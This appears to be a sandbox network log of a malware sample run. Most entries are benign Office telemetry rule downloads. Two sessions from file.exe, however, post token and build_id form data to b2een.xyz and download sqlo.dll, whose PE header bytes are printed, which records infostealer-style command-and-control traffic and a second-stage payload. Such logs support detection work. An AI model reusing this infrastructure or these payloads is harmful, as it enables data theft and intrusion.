2024-11-25 10:33:33 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.5	49749	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:32 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:33 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:32 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 3c6e4b4f-901e-005b-7308-3d2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103332Z-178bfbc474bpnd5vhC1NYC4vr4000000079g000000007z61 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:33 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.5	49750	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:32 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:33 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:33 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: d6db62af-701e-0097-3243-3db8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103333Z-174c587ffdf89smkhC1TEB697s00000005xg000000006m3w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:33 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.5	49751	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:33 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:33 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:33 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 043e45ca-501e-0078-1031-3e06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103333Z-178bfbc474b9xljthC1NYCtw94000000074g00000000b4tt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:33 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49752	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:34 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 5889 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:34 UTC	5889	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------IJJJEBFHDBGIECBFCBKJCont
2024-11-25 10:33:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:35 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.5	49753	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:34 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:35 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:35 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: c2388785-401e-0048-0e03-3e0409000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103335Z-178bfbc474bgvl54hC1NYCsfuw000000077000000000bt47 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:35 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.5	49755	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:34 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:35 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:35 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 414c800a-401e-0035-7cbf-3e82d8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103335Z-178bfbc474bbcwv4hC1NYCypys00000007400000000099g9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:35 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.5	49754	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:34 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:35 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:35 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 33a5509c-101e-00a2-2819-3d9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103335Z-178bfbc474bnwsh4hC1NYC2ubs00000007f0000000002r58 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:35 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.5	49756	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:35 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:35 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:35 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: ed66cbfc-201e-0051-7e30-3c7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103335Z-178bfbc474btrnf9hC1NYCb80g00000007dg000000009gu0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:35 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.5	49757	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:35 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:35 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:35 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103335Z-174c587ffdf4zw2thC1TEBu34000000005w000000000akg1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:35 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49758	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:35 UTC	232	OUT	GET /sqlo.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:36 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:35 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Monday, 25-Nov-2024 10:33:35 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-25 10:33:36 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-11-25 10:33:36 UTC	16384	IN	Data Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-11-25 10:33:36 UTC	16384	IN	Data Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
